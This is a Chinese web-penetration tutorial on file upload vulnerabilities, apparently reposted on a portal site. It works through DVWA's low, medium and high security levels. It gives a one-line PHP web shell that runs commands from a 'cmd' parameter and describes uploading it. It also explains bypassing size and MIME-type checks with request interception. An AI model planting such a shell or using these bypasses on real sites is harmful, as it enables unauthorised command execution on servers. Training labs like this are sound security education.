江苏龙网

  1. 主页 > 生活百科 > >

Web渗透_文件上传漏洞介绍

漏洞

文件上传漏洞 
<?phpecho shell_exec($_GET['cmd']);?> #通过cmd去执行命令 

Web渗透_文件上传漏洞介绍

文章插图
 
  • 将上方的代码通过文件上传的方式上传到服务器上,之后进行访问
 
Web渗透_文件上传漏洞介绍

文章插图
 

Web渗透_文件上传漏洞介绍

文章插图
 
  • dvwa中对文件上传的内容是有过滤的,只允许100k大小的文件上传
 
Web渗透_文件上传漏洞介绍

文章插图
 
  • 我们可以把截断功能打开
 
Web渗透_文件上传漏洞介绍

文章插图
 
  • 然后再次上传一个超过大小的文件
 
Web渗透_文件上传漏洞介绍

文章插图
 
  • 我们通过修改最大文件大小去绕过这个限制,即可看到上传成功
 
Web渗透_文件上传漏洞介绍

文章插图
 

Web渗透_文件上传漏洞介绍

文章插图
 
  • 上面是低安全等级的,我们调到中等安全等级看下代码
 
File Upload Source<?phpif (isset($_POST['Upload'])) {$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";$target_path = $target_path . basename($_FILES['uploaded']['name']);$uploaded_name = $_FILES['uploaded']['name'];$uploaded_type = $_FILES['uploaded']['type'];$uploaded_size = $_FILES['uploaded']['size'];if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {echo '<pre>';echo 'Your image was not uploaded.';echo '</pre>';} else {echo '<pre>';echo $target_path . ' succesfully uploaded!';echo '</pre>';}}else{echo '<pre>Your image was not uploaded.</pre>';}}?> 
从上面的代码我们能够看出来,他对文件进行了大小和类型的判断;
 
  • 我们的思路就是用bp的截断功能去修改请求的参数,将1.php文件类型改为image/jpeg即可,这里不做详细演示了哈
 
Web渗透_文件上传漏洞介绍

文章插图
 
  • 再来看下高安全级别的dvwa代码
 
File Upload Source<?phpif (isset($_POST['Upload'])) {$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";$target_path = $target_path . basename($_FILES['uploaded']['name']);$uploaded_name = $_FILES['uploaded']['name'];$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);$uploaded_size = $_FILES['uploaded']['size'];if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {echo '<pre>';echo 'Your image was not uploaded.';echo '</pre>';} else {echo '<pre>';echo $target_path . ' succesfully uploaded!';echo '</pre>';}}else{echo '<pre>';echo 'Your image was not uploaded.';echo '</pre>';}}?>


推荐阅读


上一篇:Java基于分治算法实现的棋盘覆盖问题示例

下一篇:航天员|陈乔恩7000元香奈儿球鞋把蟑螂打爆浆,丸子头与小贝长子斗帅